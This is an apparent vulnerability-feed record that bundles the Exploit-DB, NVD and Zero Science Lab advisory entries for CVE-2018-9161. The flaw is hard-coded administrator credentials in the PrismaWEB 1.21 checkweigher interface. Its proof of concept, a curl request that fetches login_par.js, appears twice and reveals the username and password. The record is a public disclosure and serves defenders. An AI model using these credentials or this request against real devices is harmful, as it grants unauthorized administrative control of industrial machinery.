{"id": "EDB-ID:44276", "bulletinFamily": "exploit", "title": "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials", "description": "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials. Webapps exploit for Multiple platform", "published": "2018-03-12T00:00:00", "modified": "2018-03-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/44276/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-9161"], "type": "exploitdb", "lastseen": "2018-05-24T14:07:20", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "1fb553a5ebc391a3ec57df08f9dcc5a3"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "ae1a5abdae580c8e6894f60024ee8d67"}, {"key": "href", "hash": "80ab31f37b6460b566e507a863274bd6"}, {"key": "modified", "hash": "5850355f6181ab9617cc0d094e464031"}, {"key": "osvdbidlist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "published", "hash": "5850355f6181ab9617cc0d094e464031"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "sourceData", "hash": "8d9d7584fdfb2f638d63d9fb1fe4c614"}, {"key": "sourceHref", "hash": "b2bcc8bec1ad80d08ae0a66c4c757144"}, {"key": "title", "hash": "56eecfa4a39e9da658a6747ff2d1c089"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "hash": "d8aa9f795c50450549e9af40598845a647adf21a261277e304d89b8944908e66", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-05-24T14:07:20"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceHref": "https://www.exploit-db.com/download/44276/", "sourceData": "Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass\r\n\r\n\r\nVendor: Prisma Industriale S.r.l.\r\nProduct web page: https://www.prismaindustriale.com\r\nAffected version: 1.0 (Rev 21, EPROM 202FWSAM ??)\r\n\r\nSummary: Web Administration of Machine.\r\n\r\nDesc: The vulnerability exists due to the disclosure of hard-coded credentials allowing\r\nan attacker to effectively bypass authentication of PrismaWEB with administrator\r\nprivileges. The credentials can be disclosed by simply navigating to the login_par.js\r\nJavaScript page that holds the username and password for the management interface that\r\nare being used via the Login() function in /scripts/functions_cookie.js script.\r\n\r\nTested on: HMS AnyBus-S WebServer\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2018-5453\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php\r\n\r\n06.02.2018\r\n\r\n---\r\n\r\n\r\n$ curl http://10.10.10.70/user/scripts/login_par.js\r\n// JavaScript Document\r\n// 11 Dicembre 2009 Release 1.0 Rev.10\r\n\r\nvar txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login\r\nvar txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login", "osvdbidlist": []}

{"cve": [{"lastseen": "2018-05-12T10:39:17", "references": ["https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php", "https://www.exploit-db.com/exploits/44276/"], "description": "Prisma Industriale Checkweigher PrismaWEB 1.21 allows remote attackers to discover the hardcoded prisma password for the prismaweb account by reading user/scripts/login_par.js.", "edition": 2, "reporter": "NVD", "published": "2018-03-31T18:29:00", "title": "CVE-2018-9161", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-9161"], "scanner": [], "modified": "2018-05-11T13:04:27", "cpe": ["cpe:/a:prismaindustriale:checkweigher_prismaweb:1.21"], "id": "CVE-2018-9161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9161", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zeroscience": [{"lastseen": "2018-08-31T00:35:53", "references": [], "description": "Title: Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass \nAdvisory ID: [ZSL-2018-5453](<ZSL-2018-5453.php>) \nType: Local/Remote \nImpact: DoS, Security Bypass, System Access \nRisk: (5/5) \nRelease Date: 10.03.2018 \n\n\n##### Summary\n\nWeb Administration of Machine. \n\n##### Description\n\nThe vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. \n\n##### Vendor\n\nPrisma Industriale S.r.l. - <https://www.prismaindustriale.com>\n\n##### Affected Version\n\n1.0 (Rev 21, EPROM 202FWSAM ??) \n\n##### Tested On\n\nHMS AnyBus-S WebServer \n\n##### Vendor Status\n\n[06.02.2018] Vulnerability discovered. \n[19.02.2018] Vendor contacted. \n[09.03.2018] No response from the vendor. \n[10.03.2018] Public security advisory released. \n\n##### PoC\n\n[prismaweb_auth.txt](<../../codes/prismaweb_auth.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - &lt;[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)&gt;\n\n##### References\n\n[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/140264> \n[2] <https://packetstormsecurity.com/files/146726> \n[3] <https://cxsecurity.com/issue/WLB-2018030101> \n[4] <https://www.exploit-db.com/exploits/44276/> \n[5] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9161> \n[6] <https://nvd.nist.gov/vuln/detail/CVE-2018-9161>\n\n##### Changelog\n\n[10.03.2018] - Initial release \n[16.03.2018] - Added reference [1], [2], [3] and [4] \n[19.04.2018] - Added reference [5] and [6] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 7, "reporter": "Gjoko Krstic", "published": "2018-03-10T00:00:00", "title": "Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass", "type": "zeroscience", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9161"], "modified": "2018-03-10T00:00:00", "id": "ZSL-2018-5453", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php", "sourceData": "\r\nPrisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass\r\n\r\n\r\nVendor: Prisma Industriale S.r.l.\r\nProduct web page: https://www.prismaindustriale.com\r\nAffected version: 1.0 (Rev 21, EPROM 202FWSAM ??)\r\n\r\nSummary: Web Administration of Machine.\r\n\r\nDesc: The vulnerability exists due to the disclosure of hard-coded credentials allowing\r\nan attacker to effectively bypass authentication of PrismaWEB with administrator\r\nprivileges. The credentials can be disclosed by simply navigating to the login_par.js\r\nJavaScript page that holds the username and password for the management interface that\r\nare being used via the Login() function in /scripts/functions_cookie.js script.\r\n\r\nTested on: HMS AnyBus-S WebServer\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2018-5453\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php\r\n\r\n06.02.2018\r\n\r\n---\r\n\r\n\r\n$ curl http://10.10.10.70/user/scripts/login_par.js\r\n// JavaScript Document\r\n// 11 Dicembre 2009 Release 1.0 Rev.10\r\n\r\nvar txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login\r\nvar txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/prismaweb_auth.txt"}]}